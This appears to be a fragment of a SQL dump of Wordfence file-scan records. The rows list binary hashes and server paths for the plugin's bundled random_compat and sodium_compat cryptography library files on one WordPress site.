('œñûÄúžP‹Jætûú1z', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '!¿ìE«µP]Ç¡;Ÿ™', '<¿ø‹¦\0ß\rIB="„P8DÇ"÷¶àôÀL~è€I[', '', 0, '?'),
('wÃ‹ôíÊ9/,+1ý‚', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‚gÛ°/*±‚ÈC,k#', 'avxu«‹í¶j¦«=žI¢S¶ÑD{‘ùÞÁ’!', '', 0, '?'),
('YVô™2™•9}D8£', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¨CZ?Î@J±N_ji<”\Z', '€<¸HÀ„¢"ØôF¯@÷¬Œõ%®®Ú1`7<Òð	¢Í}', '', 0, '?'),
('æÏå¼èP¿IcDÄËÆ¾è', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'øÌ®ÙJ˜sÓÇ™ùB', '¥²ER ôJbÆÈ¸I"ÊìtÞ],˜qPþ1\\fD', '', 0, '?'),
('¬Ioo¨Ô†5nu¤Ñ­¶ˆH', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/LICENSE', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/LICENSE', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '0?½½4''+Ì¶¼L)$”', 'ÌY	ORÙ´@†M¾‚ÉòßöÃ=‘™žxMéK©\Z.', '', 0, '?'),
('³iÈœÌ1Šé\0¦ÎèÁ8', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-php7.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-php7.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ó¶S;h8î^ÑÜgÔR', 'ãÐmëfÊ¬º ×S¢XTª¥ÅÃ8ÌàA¥-¾g', '', 0, '?'),
('Í^&‘ó`Ráy’‹™ìJ', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ðáa§j@DùTØª¶+9w', 'È”qÆ4q+@g¿©s€vz,Ø~F­éº¦\r$aêÉ', '', 0, '?'),
('&Ïñ—»2 ý¨äÅ', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/composer-php52.json', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/composer-php52.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ylhÊwž%Re¯ç†', '´›ä¸\njq½WíÛ	×v_æ#„ï fºàµ~ÍÒR‘>', '', 0, '?'),
('°-¨ì·“ö·9ñExZ', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Xw÷¾•Tg¨ËA}Í\n', '®k¡cQxúeôË³`=n6ÏX5y‚Þdz5u]WB''', '', 0, '?'),
('Ï×€yKvçÓ.ù\Z±', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '>¹„_Ð3õÑNw°#÷', 'àÇ¥ãmZz*,=:\n½Ù-è3™™|£Äù!“ãß', '', 0, '?'),
('«?H“©ÿÄë—h¬D0	', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '(j[¤‘}£B yVyáKR', '²,Ç4AX$sÊsÀÿâ¨y“©EžmïPžð¸YÀÐ<', '', 0, '?'),
('¥Êä*«¥h^íÜÛ¯ïì', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat_const.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat_const.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '''cÆrÄÏ™Dq5''G‰á~', 'H.„‡œ#\nDêé¿u9uðq…<fAßÑ	e°ÕV1¸Å', '', 0, '?'),
('‡ÒvÂdåEI¿‰¿|çIÇ', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/ristretto255.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/ristretto255.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ùi3ÿs&©‹ÿa‘\Zw', 'õžMÚ8Jg†ØA¹\r§¬`cY5¶~>,Ea%öðog', '', 0, '?'),
('\núÙ:ÂX2ÞL•Žnc', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'S»ØÉ›m§šƒEö}Zh', '¨Ö-yºç¢.Í=ýU¿å6¿\n6¡´8h&Ûè“9#', '', 0, '?'),
('„K ¸SEËÿÅL§3À', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/stream-xchacha20.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/stream-xchacha20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'V=¤ˆâ˜Ör®@Ù¸~kt™', '|”J\0R]-ð2ž”˜°3zù¿ÊTƒþëH?Uˆì‚', '', 0, '?'),
('¸ÛZŠÌ(“Å§|ŸÍZ', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'QUÿp~ocÃŠ4ÒNt›û', '”LÎÞnµl2@Îö>hši,uJY²H¦‰\\ãLô,²B', '', 0, '?'),
('Î½Ê}ØVº+µtB³', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '­žê¤€”xÃÙ ·%•cl', 'Nž8,ÿcÝÛíëaež¬ÓñÎŸi<5p$³¿ó', '', 0, '?'),
('!I­d]5$Œ¥À[àÖ~¬', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'oû¿LÑöÕ k''k1Šþ', 'Žœ1ê \\¯Qt©*¼€îJïÑêŽý%…ØËsˆò&', '', 0, '?'),
('Ýæˆ''˜Ä|?˜Â>ûí£', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ƒ¦÷LÕòaDJ„?ûƒZÿ”', 'ˆ»‹…=F=„=…<øø_%ˆ=§ÙM?áªÝÜÞçu/', '', 0, '?'),
('IÖPEÐXtœFHï%–', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '®šó\0ÂõìLv¿[cÞÎ)?', '¤CÚh!Ý€F$ì}¹wd¸7b(¦!äp÷IF.L', '', 0, '?'),
('‚W= \\''x"ˆWÌ}îîd', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '§°÷Õ©èK½­ƒ^ã¥¾¹', 'ÏM‰8:ŸnaÆ‹GZÝqQdÃ½!® ¼Ú''‡›&g1', '', 0, '?'),
('Z£°Ñô„ûÝ’¯ºS¥', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ló¿Œ\Z^Z’HG³%©O£', '‰m¤»Ÿc´;ò\nyã²ÈÅ0,Æ5ÿ‹ÙF|=ÈC', '', 0, '?'),
(',zØe©àúY#uJ~[P\r', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ' OpR{üÒµŒçGÝÛ', '“Y’ü:B†åÅP5M€s_†¼±š¹.Ù†úÖŽ', '', 0, '?'),
('âBK†ÀõA—a<ä­l2', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÉXß“à¾Å’"X3î6DQÝ', '!l.º.¬êGIî´\n7oeÈÑ¿è'';Iÿ\n\n³ ì', '', 0, '?'),
('\\Ÿ¤Ð\ZéŽe	Í)ŸÕUp', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'È‘Hä\Zb’>VïDö¢R2', 'rÑ›JÔ‘I/é\nO‹Y}œxš‚Å†ë”Þú‡ÆU ', '', 0, '?'),
('“º¼ÒÁbqÀ/¤ÙÛF¤k', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ßðª­7‡õÂ¤\r¬FÄÝg', 'žn’V''ŒV±û»¤Vî²)F|*á‘2ˆNà×z', '', 0, '?'),
('‡^Sx_?u‹GÊD©äë', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '”ÏHÙd9<CðË¤«šÑbl', 'KÏ.Bo¬°ßØà£¸ƒvüˆb˜%…˜àÕS~1ùKàÃ', '', 0, '?'),
('N=®fÐ>$KŠäâH¼TÎ', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÇÓë‘?G{òõ¸ñg', 'Ä€Ð <WŸ;-\Zñ€™¾—(C+¼,Mþ•ÌUâáW6', '', 0, '?'),
('·ï/ïöØŠ!¤N>ñ‚\nþ', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ú¢f<_2S^I¿ªZ', 'ý­iÝ¯™ÿ8{‘iü´Øq!d¾ ÌÕ¨åAzòõ©', '', 0, '?'),
('YŸBWy	+æB‘OmÇýz', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '#ž:šáNÅ''”DxƒÑN', '¦[§õ_|ÐØ~E©¶©í+¯~ÅEì€(‘`í_ª¾', '', 0, '?'),
('KËLx<C Ž˜H”ôe\Z', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '-·ENäÄ‚Û›(\nún', 'š÷Þ¡Ñ¬}^EFÐù›ÊÞ>ô’Ú‚BìÛ', '', 0, '?'),
('F1+\Z#÷+dÓ{‹wÎ{', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'þ.D6·pŸišr`¶fwÞ=', 'Ä2É±KJ73†ñx§2ÚM2°®&˜+·Œ•Lü‡L', '', 0, '?'),
('£šEöSÔc+ßñ#º)', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'uÒNm…Sáí”ÔCÛÒ{ç', 'üØÔP~{pÕÔ}x{Ô82hXöxÅÁ»ˆ', '', 0, '?'),
('!Plu6 “ðë¡¼ÒCZ', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'àò˜ˆÁPÅÏÙe–‰1', 'T¨ÿû*”Û+†ÐøÊz]Êœ;>¯\nà3ÊÊä]?x×', '', 0, '?'),
('ia{–-ÏÛ\Z÷Ø™o³’', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ž}©<ÌÄÜŽ‚s¾òœ9', 'þÝQÇþ''Ør™† ¼t7¥â=s*a`<¾zÚoÔ_', '', 0, '?'),
('Üþ¼¬"8YŽŽ74·O<', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'di²BDõJòˆ¯D¥5ÃO', 'N«a‡º–iBÏñÍ\røÆAO]¶¬©@áPµå', '', 0, '?'),
('´ÁjðÖ¹J‚Üþ‘ö0Y', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'p§0W"F)”ÏŽ“8O£', '©5¬œð)&ÚÙBoK]®¯¤Ø»Žó–rm`%®ÊhöO', '', 0, '?'),
('¨Û	Ì")¥"µè0I£o¨Ç', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '­z„¿q\Zs˜¾q776ó', 'C®D­a–$ê¹=›f[Q§4ÂJWÑ7l)®.Þ=%¯ÿ', '', 0, '?'),
('ý’ZL‹O’lÖá', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¦Cí¢•ðFæ–hôz', 'oÅ‘\nw¦n¾ËpL”+;ÐÌíß~‹¨t2´P*Æƒ6ø', '', 0, '?'),
('¸d`#)?žÏ³šÏ0(w‡ù', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ' ÁoYƒ¢Û-ã)EHd', 'lÜ,8¿EñT—ŽC‘eylžaùSîÔ;)''"dÌ`zû™', '', 0, '?'),
('G<7eƒtª/î’÷W¤', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '[f0L”ÅŸ»Ò\r³{VWè', '‹Ð''&Ü”[m`ÄÏŠÐc2EºÇû%äW¿GWºä‰·', '', 0, '?'),
(' Ät’Êh¼	,Gx¢"M', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'hÂ!Ø¹ÞÃ™ÃÆk?=ìÓˆ', '+ËMBö‚W»·E€¥J1\0g¦êûÅ_¹’WF,|ª', '', 0, '?'),
(' ŸG¶Ê´©¨GtØ‘›¤', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '8€NÃÅâ\ZÂÈ–vë“ª', '+uRÜA–eµfáY­)%–;*\Z¡y†ÉïUóŠ„', '', 0, '?'),
('(µ|ÿZ¢x´T‡þ‚[Áu', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Original.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Original.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Òz?®é(»…EîWup¹', '¨+‹ëê‡Dï\0ej³\rgÆÎèÏ§¶„4ñ', '', 0, '?'),
('ˆ¡Kk©fõgÿçT¤#”V', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/UrlSafe.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/UrlSafe.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Šer›Éx‡‡|2c½Ó', 'š÷ËÒ.C¹¿@2ˆPÖcÖœ‚^n\n”''-‡v[~', '', 0, '?'),
('ü·qóLøó>ÔÆ#QÄ\0', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ÿ}$š?¡áÌßÓiý‡Ã', 'q„÷•nö&%G‰Ì~\\—¦^½éÆÓš—Ø0›', '', 0, '?'),
('xLKx ––2¸¯Isò!#Q', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Î\r—U¡ŠöÖýÚCB"', 'ƒú)M£¦•ì©‚tUÊä¯Î´ÕÔªÛù¯ÌF.ü', '', 0, '?'),
('Ð%#óºétÁÏò4„x', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'y¨Wû0{Xån§Zÿ0', 'Å\0AVðŒRXˆÊÈ•Ê~Üád§^í/)…@RòÆ', '', 0, '?'),
('P „ôÒNtD«ÝŒŸn"±', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'µyñáëÑKì]õ¨ íº¾', 'b}"©ozÒýV(\rV''QuËI‚v¹¹êù¡îî', '', 0, '?'),
('$îŠPÙ`‰‰\0gï¨X²', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'yFÂ“\\œ»â…Û2šÏÿí', '2k¡sÀÚ\\>ª…RI:nHðÈ¿Dmà!zzØ±À', '', 0, '?'),
('Z9“¶Ó}.ÒÂJ¤Âk=ª', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '8I¢ã¶\Z\nÙÓ£‘', 'i>z’½R“@¯ÅòáÂãkôWà6uškÕyˆ', '', 0, '?'),
('P¶bw¿=‚Ìõ”©ië–Ò', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\\\ZÁÄIw5AlLÛ¢', 'úã´K{þ8¦Àfl…7s…RhÎúëžå—‹Ê‘I', '', 0, '?'),
('Ä-²°''g‹«P÷\\¬', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '9žVÆ#Ò¹ëÛ4€', 'Gpšf¸øHvŽ†žŸ\Zæóx‹8ƒþª£1C°[Î4A', '', 0, '?'),
('AK<¬ËÒj§œgsrã', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '4¬•Kb(å\\Þóp¸B-', 'ç•Õ³* Ê°	¶ä†[qŠ¦ËœPˆæ‚ôk', '', 0, '?'),
('ð ÀÞ<:9Î|ÂÎ6', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '²&Nu)©wgÆ¡g^&ÃÌ', '5!Úìªì…”N{Gc¨ÛûºyÞ]òü>\\;B!Ù', '', 0, '?'),
('vLM—.fÕìÔ%OMR', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\0ÏOëÿÇ†„ìq+O', '5›''†Ë½ÒR¿þç³ÖEÒ»56¯½ÆdšìåÅgo', '', 0, '?'),
('ÿÍÚÛŸ½Ïb…B', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'õñ:êCVF¼‘ïÐ†R', ',)¼ø§|F…aµêæ‚ƒÓfœÙ>œÀ;JÎß\\', '', 0, '?'),
('oCÉ"ÀÏ…Q¸ëàtƒÑy', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '±Â+Áë’þõ%', 'Á4!ýˆHü:6>ËlEîæEc#œÐØùa{A´{', '', 0, '?'),
